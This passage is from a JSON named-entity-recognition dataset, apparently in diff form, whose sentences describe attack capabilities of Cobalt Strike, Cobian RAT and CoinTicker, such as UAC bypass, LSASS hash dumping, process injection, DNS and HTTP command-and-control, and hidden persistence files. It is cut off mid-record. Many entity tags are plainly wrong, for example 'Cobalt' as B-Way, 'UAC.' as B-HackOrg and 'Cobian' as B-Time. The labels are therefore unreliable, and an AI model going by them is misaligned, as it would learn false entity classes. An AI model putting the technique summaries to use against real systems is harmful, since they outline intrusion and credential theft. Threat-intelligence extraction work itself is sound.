- "Strike", - "can", - "perform", - "browser", - "pivoting", - "and", - "inject", - "into", - "a", - "user's", - "browser", - "to", - "inherit", - "cookies,", - "authenticated", - "HTTP", - "sessions,", - "and", - "client", - "SSL", - "certificates." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Way", - "B-Way", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "a", - "number", - "of", - "known", - "techniques", - "to", - "bypass", - "Windows", - "UAC." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "self", - "signed", - "Java", - "applets", - "to", - "execute", - "signed", - "applet", - "attacks." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "a", - "custom", - "command", - "and", - "control", - "protocol", - "that", - "can", - "be", - "encapsulated", - "in", - "DNS.", - "All", - "protocols", - "use", - "their", - "standard", - "assigned", - "ports." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "will", - "break", - "large", - "data", - "sets", - "into", - "smaller", - "chunks", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "collect", - "data", - "from", - "a", - "local", - "system." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "deobfuscate", - "shellcode", - "using", - "a", - "rolling", - "XOR", - "and", - "decrypt", - "metadata", - "from", - "Beacon", - "sessions." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "has", - "the", - "ability", - "to", - "use", - "Smart", - "Applet", - "attacks", - "to", - "disable", - "the", - "Java", - "SecurityManager", - "sandbox." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "deliver", - "Beacon", - "payloads", - "for", - "lateral", - "movement", - "by", - "leveraging", - "remote", - "COM", - "execution." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "determine", - "if", - "the", - "user", - "on", - "an", - "infected", - "machine", - "is", - "in", - "the", - "admin", - "or", - "domain", - "admin", - "group." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "known", - "credentials", - "to", - "run", - "commands", - "and", - "spawn", - "processes", - "as", - "a", - "domain", - "user", - "account." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "has", - "the", - "ability", - "to", - "accept", - "a", - "value", - "for", - "HTTP", - "Host", - "Header", - "to", - "enable", - "domain", - "fronting." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "I-HackOrg", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "identify", - "targets", - "by", - "querying", - "account", - "groups", - "on", - "a", - "domain", - "contoller." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "has", - "the", - "ability", - "to", - "load", - "DLLs", - "via", - "reflective", - "injection." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "exploit", - "Oracle", - "Java", - "vulnerabilities", - "for", - "execution,", - "including", - "CVE-2011-3544,", - "CVE-2013-2465,", - "CVE-2012-4681,", - "and", - "CVE-2013-2460." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Exp", - "O", - "O", - "O", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "exploit", - "vulnerabilities", - "such", - "as", - "MS14-058." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "conduct", - "peer-to-peer", - "communication", - "over", - "Windows", - "named", - "pipes", - "encapsulated", - "in", - "the", - "SMB", - "protocol.", - "All", - "protocols", - "use", - "their", - "standard", - "assigned", - "ports." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "explore", - "files", - "on", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "includes", - "a", - "capability", - "to", - "modify", - "the", - "Beacon", - "payload", - "to", - "eliminate", - "known", - "signatures", - "or", - "unpacking", - "methods." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "deliver", - "additional", - "payloads", - "to", - "victim", - "machines." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "be", - "configured", - "to", - "have", - "commands", - "relayed", - "over", - "a", - "peer-to-peer", - "network", - "of", - "infected", - "hosts.", - "This", - "can", - "be", - "used", - "to", - "limit", - "the", - "number", - "of", - "egress", - "points,", - "or", - "provide", - "access", - "to", - "a", - "host", - "without", - "direct", - "internet", - "access." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Cobalt", - "Strike", - "System", - "Profiler", - "can", - "use", - "JavaScript", - "to", - "perform", - "reconnaissance", - "actions." - ], - "ner_tags": [ - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "track", - "key", - "presses", - "with", - "a", - "keylogger", - "module." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "spawn", - "a", - "job", - "to", - "inject", - "into", - "LSASS", - "memory", - "and", - "dump", - "password", - "hashes." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "known", - "credentials", - "to", - "run", - "commands", - "and", - "spawn", - "processes", - "as", - "a", - "local", - "user", - "account." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "<code>net", - "localgroup</code>", - "to", - "list", - "local", - "groups", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "make", - "tokens", - "from", - "known", - "credentials." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "modify", - "Registry", - "values", - "within", - "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Excel", - "Version>\\Excel\\Security\\AccessVBOM\\</code>", - "to", - "enable", - "the", - "execution", - "of", - "additional", - "code." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "O", - "I-Features", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike's", - "Beacon", - "payload", - "is", - "capable", - "of", - "running", - "shell", - "commands", - "without", - "<code>cmd.exe</code>", - "and", - "PowerShell", - "commands", - "without", - "<code>powershell.exe</code>" - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "perform", - "port", - "scans", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "query", - "shared", - "drives", - "on", - "the", - "local", - "system." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "be", - "configured", - "to", - "use", - "TCP,", - "ICMP,", - "and", - "UDP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "hash", - "functions", - "to", - "obfuscate", - "calls", - "to", - "the", - "Windows", - "API", - "and", - "use", - "a", - "public/private", - "key", - "pair", - "to", - "encrypt", - "Beacon", - "session", - "metadata." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "has", - "the", - "ability", - "to", - "use", - "an", - "Excel", - "Workbook", - "to", - "execute", - "additional", - "code", - "by", - "enabling", - "Office", - "to", - "trust", - "macros", - "and", - "execute", - "code", - "without", - "user", - "permission." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "spawn", - "processes", - "with", - "alternate", - "PPIDs." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "perform", - "pass", - "the", - "hash." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "execute", - "a", - "payload", - "on", - "a", - "remote", - "host", - "with", - "PowerShell.", - "This", - "technique", - "does", - "not", - "write", - "any", - "data", - "to", - "disk.", - "Cobalt", - "Strike", - "can", - "also", - "use", - "PowerSploit", - "and", - "other", - "scripting", - "frameworks", - "to", - "perform", - "execution." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "spoof", - "arguments", - "in", - "spawned", - "processes", - "that", - "execute", - "beacon", - "commands." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike's", - "Beacon", - "payload", - "can", - "collect", - "information", - "on", - "process", - "details." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "process", - "hollowing", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "inject", - "a", - "variety", - "of", - "payloads", - "into", - "processes", - "dynamically", - "chosen", - "by", - "the", - "adversary." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "mimic", - "the", - "HTTP", - "protocol", - "for", - "C2", - "communication,", - "while", - "hiding", - "the", - "actual", - "data", - "in", - "either", - "an", - "HTTP", - "header,", - "URI", - "parameter,", - "the", - "transaction", - "body,", - "or", - "appending", - "it", - "to", - "the", - "URI." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "uses", - "a", - "custom", - "command", - "and", - "control", - "protocol", - "that", - "is", - "encapsulated", - "in", - "HTTP,", - "HTTPS,", - "or", - "DNS.", - "In", - "addition,", - "it", - "conducts", - "peer-to-peer", - "communication", - "over", - "Windows", - "named", - "pipes", - "encapsulated", - "in", - "the", - "SMB", - "protocol.", - "All", - "protocols", - "use", - "their", - "standard", - "assigned", - "ports." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "Python", - "to", - "perform", - "execution." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "query", - "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\<Excel", - "Version>\\Excel\\Security\\AccessVBOM\\</code>", - "to", - "determine", - "if", - "the", - "security", - "setting", - "for", - "restricting", - "default", - "programmatic", - "access", - "is", - "enabled." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike's", - "<code>execute-assembly</code>", - "command", - "can", - "run", - "a", - ".NET", - "executable", - "within", - "the", - "memory", - "of", - "a", - "sacrificial", - "process", - "by", - "loading", - "the", - "CLR." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "start", - "a", - "VNC-based", - "remote", - "desktop", - "server", - "and", - "tunnel", - "the", - "connection", - "through", - "the", - "already", - "established", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "uses", - "the", - "native", - "Windows", - "Network", - "Enumeration", - "APIs", - "to", - "interrogate", - "and", - "discover", - "targets", - "in", - "a", - "Windows", - "Active", - "Directory", - "network." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "`rundll32.exe`", - "to", - "load", - "DLL", - "from", - "the", - "command", - "line." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "Window", - "admin", - "shares", - "(C$", - "and", - "ADMIN$)", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "SSH", - "to", - "a", - "remote", - "service." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "set", - "its", - "Beacon", - "payload", - "to", - "reach", - "out", - "to", - "the", - "C2", - "server", - "on", - "an", - "arbitrary", - "and", - "random", - "interval." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike's", - "Beacon", - "payload", - "is", - "capable", - "of", - "capturing", - "screenshots." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "recover", - "hashed", - "passwords." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "PsExec", - "to", - "execute", - "a", - "payload", - "on", - "a", - "remote", - "host.", - "It", - "can", - "also", - "use", - "Service", - "Control", - "Manager", - "to", - "start", - "new", - "services." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Cobalt", - "Strike", - "System", - "Profiler", - "can", - "discover", - "applications", - "through", - "the", - "browser", - "and", - "identify", - "the", - "version", - "of", - "Java", - "the", - "target", - "has." - ], - "ner_tags": [ - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "Base64,", - "URL-safe", - "Base64,", - "or", - "NetBIOS", - "encoding", - "in", - "its", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "<code>sudo</code>", - "to", - "run", - "a", - "command." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "has", - "the", - "ability", - "to", - "use", - "AES-256", - "symmetric", - "encryption", - "in", - "CBC", - "mode", - "with", - "HMAC-SHA-256", - "to", - "encrypt", - "task", - "commands", - "and", - "XOR", - "to", - "encrypt", - "shell", - "code", - "and", - "configuration", - "data." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "determine", - "the", - "NetBios", - "name", - "and", - "the", - "IP", - "addresses", - "of", - "targets", - "machines", - "including", - "domain", - "controllers." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "produce", - "a", - "sessions", - "report", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "enumerate", - "services", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "timestomp", - "any", - "files", - "or", - "payloads", - "placed", - "on", - "a", - "target", - "machine", - "to", - "help", - "them", - "blend", - "in." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "steal", - "access", - "tokens", - "from", - "exiting", - "processes." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "VBA", - "to", - "perform", - "execution." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "a", - "custom", - "command", - "and", - "control", - "protocol", - "that", - "can", - "be", - "encapsulated", - "in", - "HTTP", - "or", - "HTTPS.", - "All", - "protocols", - "use", - "their", - "standard", - "assigned", - "ports." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "uses", - "a", - "command-line", - "interface", - "to", - "interact", - "with", - "systems." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "WMI", - "to", - "deliver", - "a", - "payload", - "to", - "a", - "remote", - "host." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "use", - "<code>WinRM</code>", - "to", - "execute", - "a", - "payload", - "on", - "a", - "remote", - "host." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "can", - "install", - "a", - "new", - "service." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobian", - "RAT", - "has", - "a", - "feature", - "to", - "perform", - "voice", - "recording", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobian", - "RAT", - "uses", - "DNS", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "B-SecTeam", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobian", - "RAT", - "has", - "a", - "feature", - "to", - "perform", - "keylogging", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobian", - "RAT", - "creates", - "an", - "autostart", - "Registry", - "key", - "to", - "ensure", - "persistence." - ], - "ner_tags": [ - "B-Time", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobian", - "RAT", - "has", - "a", - "feature", - "to", - "perform", - "screen", - "capture." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobian", - "RAT", - "obfuscates", - "communications", - "with", - "the", - "C2", - "server", - "using", - "Base64", - "encoding." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobian", - "RAT", - "has", - "a", - "feature", - "to", - "access", - "the", - "webcam", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobian", - "RAT", - "can", - "launch", - "a", - "remote", - "command", - "shell", - "interface", - "for", - "executing", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CoinTicker", - "decodes", - "the", - "initially-downloaded", - "hidden", - "encoded", - "file", - "using", - "OpenSSL." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "CoinTicker", - "downloads", - "the", - "EggShell", - "mach-o", - "binary", - "using", - "curl,", - "which", - "does", - "not", - "set", - "the", - "quarantine", - "flag." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CoinTicker", - "downloads", - "the", - "following", - "hidden", - "files", - "to", - "evade", - "detection", - "and", - "maintain", - "persistence:", - "/private/tmp/.info.enc,", - "/private/tmp/.info.py,", - "/private/tmp/.server.sh,", - "~/Library/LaunchAgents/.espl.plist,", - "~/Library/Containers/.[random", - "string]/[random", - "string]." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CoinTicker", - "executes", - "a", - "Python", - "script", - "to", - "download", - "its", - "second", - "stage." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CoinTicker", - "creates", - "user", - "launch", - "agents", - "named", - ".espl.plist", - "and", - "com.apple.[random", - "string].plist", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "O", - 